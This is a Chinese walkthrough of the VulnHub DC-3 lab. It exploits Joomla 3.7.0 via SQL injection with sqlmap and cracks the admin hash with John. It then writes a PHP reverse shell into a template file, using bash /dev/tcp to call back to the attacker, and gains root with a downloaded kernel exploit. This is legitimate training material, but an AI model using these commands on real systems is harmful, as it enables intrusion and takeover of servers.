Vulnhub靶场 | DC系列 | DC-3

news/2024/9/19 15:34:29/文章来源:https://www.cnblogs.com/leyilea/p/18300501

DC-3

环境搭建

  1. 靶机镜像下载地址:https://vulnhub.com/entry/dc-32,312/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。

渗透测试

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

经判断,目标主机IP地址为192.168.10.149。

扫描开放的服务。

访问其Web服务,显示如下,是一个DC-3的登录页

提示如下:

这一次,只有一面旗帜,一个入口点,没有线索。
要获得国旗,您显然必须获得根特权。
你如何扎根取决于你,显然,也取决于系统。
祝你好运-我希望你喜欢这个小挑战。:-)

使用msf中的dir_scanner扫描一下后台

发现有一个http://192.168.10.149:80/administrator/,经访问,为该网站的后台地址。

网站为joomla!

在msf中搜索joomla相关的脚本,使用joomla_version探测下joomla的版本。

版本为:3.7.0

搜索一个该版本的脚本看一看

看一看该脚本的说明

经分析,是sql注入漏洞。

废话不说,直接使用试一试

没有成功,提示No logged-in Administrator or Super User user found!。意思是:未找到登录管理员或超级用户用户!

难道还需要有登录的管理员才能利用?

先看看脚本怎么写的再说吧,主要关注有没有给出注入点。

但是,好像没有直接给出注入点。

使用searchsploit在exploit-db中搜索一下 joomla 3.7.0 的脚本吧,看看有么有别的脚本可用。

┌──(root💀kali)-[~]
└─# searchsploit joomla 3.7.0

查看一下php/webapps/42033.txt文件的内容

但然,直接通过https://www.exploit-db.com搜索也可以。

可以发现,这里直接给出了注入点URL和sqlmap利用方法。

直接上sqlmap。

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

结果如下

跑一下joomladb库中的表

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb --tables

其中的#__users表着重查询下。

获取字段:

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" --columns

获取表数据:

┌──(root💀kali)-[~]
└─# sqlmap -u "http://192.168.10.149/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" -C name,password,username --dump

密码是加密过的,没有加密函数只能爆破密码了.

利用John工具,对该密码进行爆破拆解,工具详细信息参考John介绍及常用命令使用说明

新建一个文件,将密文写入

使用john对密文进行解密

┌──(root💀kali)-[~]
└─# john a.txt

得出最终的用户名admin,密码snoopy。

登录joomla的后台。

成功登录

根据joomla的特性,可以在模版中编辑模版文件,所以可以利用这一点进行写马。

打开Templates,里面默认有两个模版,选择任意一个即可。

比如将马写入protostar模版的error.php文件中。

// 反弹shell
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.10.146/4444 0>&1' ");
?>

在kali上开启监听:

┌──(root💀kali)-[~]
└─# nc -lvvp 4444

浏览器访问目标网站的 error.php文件(写入马的文件):http://192.168.10.149/templates/protostar/error.php

成功反弹shell。

但是获取到的shell权限比较低。接下来开始提权。

查找一下设置了suid的文件,并没有可以提权的命令。

换一种提权方式

使用各种查看命令,查看一下系统信息

www-data@DC-3:/var/www/html/templates/protostar$ cat /etc/issue
www-data@DC-3:/var/www/html/templates/protostar$ cat /proc/version
www-data@DC-3:/var/www/html/templates/protostar$ uname -a

搜索一下相关的漏洞利用脚本

┌──(root💀kali)-[~]
└─# searchsploit ubuntu 16.04

这里选用一个 4.4.x 相对通用的提权方式(Privilege Escalation表示提权)。

路径在linux/local/39772.txt,即/usr/share/exploitdb/exploits/linux/local/39772.txt

文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接。

地址如下:

Proof of Concept: 
https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552Exploit-DB Mirror: 
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

使用wget下载,出现404。

┌──(root💀kali)-[~]
└─# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

经查询,换到了一个新的地址:https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/tree/main/bin-sploits

┌──(root💀kali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

解压文件

根据前面/usr/share/exploitdb/exploits/linux/local/39772.txt文件中提到的使用方式进行操作。

需要将exploit.tar上传到目标主机,并解压运行~

kali启动http服务,将exploit.tar文件复制到网站根目录。

┌──(root💀kali)-[~]
└─# systemctl restart apache2                              ┌──(root💀kali)-[~]
└─# cp 39772/exploit.tar /var/www/html

在目标机器上使用wget进行下载

www-data@DC-3:/var/www/html/templates/protostar$ wget http://192.168.10.146/exploit.tar

加压exploit.tar文件

进入解压出来的目录

www-data@DC-3:/var/www/html/templates/protostar$ cd ebpf_mapfd_doubleput_exploit/

并按照39772.txt文件中的方式进行操作。

</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./compile.sh
</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./doubleput

已经获取到了root权限,但是没有交互。

利用python获取交互shell。

拿flag!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/743208.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Vulnhub靶场 | DC系列 | DC-2

Vulnhub靶场 | DC系列 | DC-2

DC-2 目录环境搭建 渗透测试环境搭建靶机镜像下载地址:https://vulnhub.com/entry/dc-2,311/ 需要将靶机和 kali 攻击机放在同一个局域网里; 本实验kali 的 IP 地址:192.168.10.146。渗透测试 使用 nmap 扫描 192.168.10.0/24 网段存活主机 ┌──(root💀kali)-[~/桌面] └…
阅读更多...
llm学习:1.3 git相关

llm学习:1.3 git相关

一、介绍 二、仓库 适当比较,砥砺前行
阅读更多...
模型部署 - TensorRT Triton 学习

模型部署 - TensorRT Triton 学习

先介绍TensorRT、Triton的关系和区别: TensorRT:为inference(推理)为生,是NVIDIA研发的一款针对深度学习模型在GPU上的计算,显著提高GPU上的模型推理性能。即一种专门针对高性能推理的模型框架,也可以解析其他框架的模型如tensorflow、torch。 主要优化手段如下: Trito…
阅读更多...
Vulnhub靶场 | DC系列 | DC-1

Vulnhub靶场 | DC系列 | DC-1

DC-1 目录环境搭建 渗透测试1. 信息收集 2. 漏洞利用 3. 提权DC ~ VulnHub VulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks. https://www.vulnhub.com/s…
阅读更多...
Smart-doc:零注解侵入的API接口文档生成插件

Smart-doc:零注解侵入的API接口文档生成插件

零注解侵入的API接口文档生成插件——Smart-doc smart-doc 是一款同时支持 JAVA REST API 和 Apache Dubbo RPC 接口文档生成的工具,在业内率先提出基于JAVA泛型定义推导的理念, 完全基于接口源码来分析生成接口文档,不采用任何注解侵入到业务代码中。 你只需要按照java-doc…
阅读更多...
如何对Linux系统进行基准测试4工具Sysbench

如何对Linux系统进行基准测试4工具Sysbench

Sysbench简介 Sysbench是一款多用途基准测试工具,可对CPU、内存、I/O甚至数据库性能进行测试。它是一个基本的命令行工具,提供了直接、简便的系统测试方法。github地址:https://github.com/akopytov/sysbench 。主要功能:CPU: 衡量CPU执行计算密集型任务的能力。 内存: 衡量…
阅读更多...
containerd 容器基础环境组件的搭建

containerd 容器基础环境组件的搭建

1 基础环境说明(1)本次所有部署软件版本说明软件名称 版本号操作系统内核(后续升级为 lt-5.4.278)CentOS 7.9.2009 (3.10.0-1160.el7) 1c1GB 20GBCentOS-7-x86_64-Minimal-2009.isocontainerd v1.6.6cfssl v1.6.1cni v1.1.1crictl v1.24.2nerdctl 1.7.6buildkit v0.14.1(2)系统…
阅读更多...
【JavaScript】聊一聊js中的浅拷贝与深拷贝与手写实现

【JavaScript】聊一聊js中的浅拷贝与深拷贝与手写实现

什么是深拷贝与浅拷贝?深拷贝与浅拷贝是js中处理对象或数据复制操作的两种方式。‌在聊深浅拷贝之前咱得了解一下js中的两种数据类型:前言 什么是深拷贝与浅拷贝?深拷贝与浅拷贝是js中处理对象或数据复制操作的两种方式。‌在聊深浅拷贝之前咱得了解一下js中的两种数据类型:…
阅读更多...
分页查询及其拓展应用案例

分页查询及其拓展应用案例

分页查询 分页查询是处理大量数据时常用的技术,通过分页可以将数据分成多个小部分,方便用户逐页查看。SQLAlchemy 提供了简单易用的方法来实现分页查询。 本篇我们也会在最终实现这样的分页效果:1. 什么是分页查询 分页查询是将查询结果按照一定数量分成多页展示,每页显示固…
阅读更多...
delphi dev cxgrid 列绑定Richedti 支持过滤

delphi dev cxgrid 列绑定Richedti 支持过滤

默认是不支持过滤的,这里需要改到内部的一些源码文件。 先说思路: 1.要让列支持过滤需要重载richedit类的 GetSupportedOperations,typeTcxRichEditProperties = class(cxRichEdit.TcxRichEditProperties)publicfunction GetSupportedOperations: TcxEditSupportedOperation…
阅读更多...
《项目管理》-笔记1

《项目管理》-笔记1

PMBOK解读 1.1项目和项目管理 项目:项目是为创造独特的产品、服务或成果而进行的临时性工作。 项目管理:在项目的活动中运用知识、技术、工具、技巧,以满足项目要求。 1.2十大知识领域 (1)项目整合管理 项目整合管理包括为识别、定义、组合、统一和协调各项目管理过程组的各…
阅读更多...
Cilium Ingress 特性(转载)

Cilium Ingress 特性(转载)

Cilium Ingress 特性Cilium Ingress 特性(转载) 一、环境信息主机 IPubuntu 10.0.0.234软件 版本docker 26.1.4helm v3.15.0-rc.2kind 0.18.0kubernetes 1.23.4ubuntu os Ubuntu 22.04.6 LTSkernel 5.15.0-106二、Cilium Ingress 流程图Cilium 现在提供了开箱即用的 Kuberne…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023